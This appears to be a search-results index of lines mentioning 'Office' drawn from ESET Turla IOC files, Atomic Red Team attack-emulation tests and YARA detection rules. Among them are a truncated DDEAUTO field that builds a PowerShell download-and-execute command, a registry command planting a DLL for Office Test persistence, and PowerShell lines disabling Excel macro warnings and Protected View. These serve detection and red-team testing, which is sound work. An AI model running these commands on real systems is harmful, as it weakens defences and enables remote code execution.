malware-ioc | misp-turla-crutch-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
malware-ioc | misp-turla-lightneuron-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
malware-ioc | misp-turla-outlook-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
malware-ioc | misp-turla-powershell-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
malware-ioc | misp-turla-powershell-event.json | "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", | © ESET 2014-2018 |
malware-ioc | misp-turla-powershell-event.json | "https://github.com/itsreallynick/office-crackros" |
© ESET 2014-2018 |
malware-ioc | misp-turla-wateringhole-armenia-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
atomic-red-team | Atomic_Friday.md | (index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" \| stats values(CommandLine) by Computer | MIT License. © 2018 Red Canary |
atomic-red-team | Office_Macro_COM.md | # Office Macro - COM | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - T1137 Office Application Startup CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - T1137.001 Office Template Macros CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - T1137.002 Office Test | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #1: Office Apllication Startup Test Persistence [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #18: Disable Microsoft Office Security Features [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #5: Office launching .bat file from AppData [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | linux-index.md | - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | linux-index.md | - T1137 Office Application Startup CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | linux-index.md | - T1137.001 Office Template Macros CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | linux-index.md | - T1137.002 Office Test CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #18: Disable Microsoft Office Security Features [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1137 Office Application Startup CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1137.001 Office Template Macros CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1137.002 Office Test | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #1: Office Apllication Startup Test Persistence [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #5: Office launching .bat file from AppData [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | linux-matrix.md | | Compromise Software Dependencies and Development Tools CONTRIBUTE A TEST | Cron | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | At (Linux) | Binary Padding | Bash History | Cloud Account CONTRIBUTE A TEST | Internal Spearphishing CONTRIBUTE A TEST | Archive via Custom Method CONTRIBUTE A TEST | Exfiltration Over Alternative Protocol | Bidirectional Communication CONTRIBUTE A TEST | Application or System Exploitation CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary |
atomic-red-team | linux-matrix.md | | | | Office Application Startup CONTRIBUTE A TEST | | Hijack Execution Flow CONTRIBUTE A TEST | Web Portal Capture CONTRIBUTE A TEST | User Activity Based Checks CONTRIBUTE A TEST | | Web Portal Capture CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
atomic-red-team | linux-matrix.md | | | | Office Template Macros CONTRIBUTE A TEST | | Impair Command History Logging | | Virtualization/Sandbox Evasion CONTRIBUTE A TEST | | | | Port Knocking CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
atomic-red-team | linux-matrix.md | | | | Office Test CONTRIBUTE A TEST | | Impair Defenses CONTRIBUTE A TEST | | | | | | Protocol Impersonation CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | Compromise Software Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | Accessibility Features | Asynchronous Procedure Call | Bash History | Cloud Account CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Library CONTRIBUTE A TEST | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Commonly Used Port CONTRIBUTE A TEST | Data Destruction | | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | | | Office Application Startup CONTRIBUTE A TEST | Port Monitors CONTRIBUTE A TEST | Impair Command History Logging | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | | | Office Template Macros CONTRIBUTE A TEST | Portable Executable Injection CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | | | Office Test | PowerShell Profile | Indicator Blocking | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | | | | Office Application Startup CONTRIBUTE A TEST | Path Interception by Search Order Hijacking CONTRIBUTE A TEST | Hidden Window | Unsecured Credentials CONTRIBUTE A TEST | | | | | Web Protocols | | | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | | | | Office Template Macros CONTRIBUTE A TEST | Path Interception by Unquoted Path | Hide Artifacts | Web Portal Capture CONTRIBUTE A TEST | | | | | Web Service CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | | | | Office Test | Port Monitors CONTRIBUTE A TEST | Hijack Execution Flow CONTRIBUTE A TEST | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | T1021.003.md | Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.md | Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.md | ##### Description: The 64-bit version of Microsoft Office must be installed | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.005.md | Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript/JScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.005.md | A note regarding this module, due to the way that this module utilizes “ScriptControl” a 64bit version of Microsoft Office is required. | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.005.md | ##### Description: The 64-bit version of Microsoft Office must be installed | MIT License. © 2018 Red Canary |
atomic-red-team | T1105.md | svchost.exe writing a non-Microsoft Office file to a file with a UNC path. | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.001.md | In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.003.md | In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | # T1137.002 - Office Test | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | <blockquote>Adversaries may abuse the Microsoft Office “Office Test” Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | There exist user and global Registry keys for the Office Test feature: | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | - Atomic Test #1 - Office Apllication Startup Test Persistence | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | ## Atomic Test #1 - Office Apllication Startup Test Persistence | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" | MIT License. © 2018 Red Canary |
atomic-red-team | T1137.002.md | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | - Atomic Test #5 - Office launching .bat file from AppData | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | ## Atomic Test #5 - Office launching .bat file from AppData | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | | microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16| | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter.</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | 10. DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:// | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | - Atomic Test #18 - Disable Microsoft Office Security Features | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | ## Atomic Test #18 - Disable Microsoft Office Security Features | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” -Name “VBAWarnings” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableInternetFilesInPV” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableUnsafeLocationsInPV” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | New-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -Name “DisableAttachementsInPV” -Value “1” -PropertyType “Dword” | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | Remove-ItemProperty -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security” -Name “VBAWarnings” -ErrorAction Ignore | Out-Null | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.001.md | Remove-Item -Path “HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView” -ErrorAction Ignore | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.md | within the office document itself. An example of this technique can be seen in sample | MIT License. © 2018 Red Canary |
atomic-red-team | T1566.001.md | There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. | MIT License. © 2018 Red Canary |
signature-base | apt_apt30_backspace.yar | $s19 = “2003 Microsoft Office system” fullword wide | CC BY-NC 4.0 |
signature-base | apt_apt30_backspace.yar | $s2 = “Microsoft Office Word Plugin Scan” fullword wide | CC BY-NC 4.0 |
signature-base | apt_apt30_backspace.yar | $s6 = “2003 Microsoft Office system” fullword wide | CC BY-NC 4.0 |
signature-base | apt_magichound.yar | description = “Detects malicious macro / powershell in Office document” | CC BY-NC 4.0 |
signature-base | apt_muddywater.yar | $s3 = “*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 O” wide | CC BY-NC 4.0 |
signature-base | apt_sednit_delphidownloader.yar | $ = “\Interface\Office\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_unit78020_malware.yar | $a4 = “\Office Start.lnk” fullword wide | CC BY-NC 4.0 |
signature-base | apt_volatile_cedar.yar | $s17 = “Office Outlook HTTP” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_winnti_burning_umbrella.yar | $s3 = “Microsoft Office Word” fullword ascii | CC BY-NC 4.0 |
signature-base | crime_cobaltgang.yar | $x9 = “lnkName=’office 365’; “ fullword ascii | CC BY-NC 4.0 |
signature-base | crime_ole_loadswf_cve_2018_4878.yar | mitigation0 = “Implement Protected View for Office documents” | CC BY-NC 4.0 |
signature-base | crime_ole_loadswf_cve_2018_4878.yar | weaponization = “Embedded in Microsoft Office first payloads” | CC BY-NC 4.0 |
signature-base | exploit_cve_2017_11882.yar | reference = “https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about” | CC BY-NC 4.0 |
signature-base | exploit_cve_2018_16858.yar | description = “RCE in Libre Office with crafted ODT file (CVE-2018-16858)” | CC BY-NC 4.0 |
signature-base | exploit_cve_2018_16858.yar | and $tag in (0..0100) // <office:doc | CC BY-NC 4.0 |
signature-base | general_officemacros.yar | description = “Detects an Microsoft Office file that contains the AutoOpen Macro function” | CC BY-NC 4.0 |
signature-base | general_officemacros.yar | description = “Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)” | CC BY-NC 4.0 |
signature-base | general_officemacros.yar | $x2 = “0M8R4KGxGuE” ascii // Base64 encoded office header D0CF11E0A1B11AE1.. | CC BY-NC 4.0 |
signature-base | generic_anomalies.yar | description = “Detects an Office document that was created with a pirated version of MS Office 2007” | CC BY-NC 4.0 |
signature-base | generic_anomalies.yar | $fp2 = “Office Feature Updates Logon” wide | CC BY-NC 4.0 |
signature-base | gen_dde_in_office_docs.yar | // YARA rules Office DDE | CC BY-NC 4.0 |
signature-base | gen_dde_in_office_docs.yar | description = “Detects DDE in MS Office documents” | CC BY-NC 4.0 |
signature-base | gen_dde_in_office_docs.yar | reference = “https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/” | CC BY-NC 4.0 |
signature-base | gen_excel_xll_addin_suspicious.yar | reference2=”https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/” | CC BY-NC 4.0 |
signature-base | gen_sign_anomalies.yar | description = “Detects a suspicious unsigned office software protection platform service binary” | CC BY-NC 4.0 |
signature-base | gen_sign_anomalies.yar | /* FileDescription Microsoft Office Software Protection Platform Service */ | CC BY-NC 4.0 |
signature-base | gen_susp_cmd_var_expansion.yar | description = “Detects Office droppers that include a variable expansion string” | CC BY-NC 4.0 |
signature-base | gen_susp_office_dropper.yar | description = “Detects Office droppers that include a notice to enable active content” | CC BY-NC 4.0 |
signature-base | gen_susp_office_dropper.yar | description = “Detects suspicious string that asks to enable active content in Office Doc” | CC BY-NC 4.0 |
signature-base | gen_susp_office_dropper.yar | $a3 = “Microsoft Office Word” fullword ascii | CC BY-NC 4.0 |
signature-base | yara_mixed_ext_vars.yar | // XML Office documents | CC BY-NC 4.0 |
MIT License. Copyright (c) 2020 Strontic.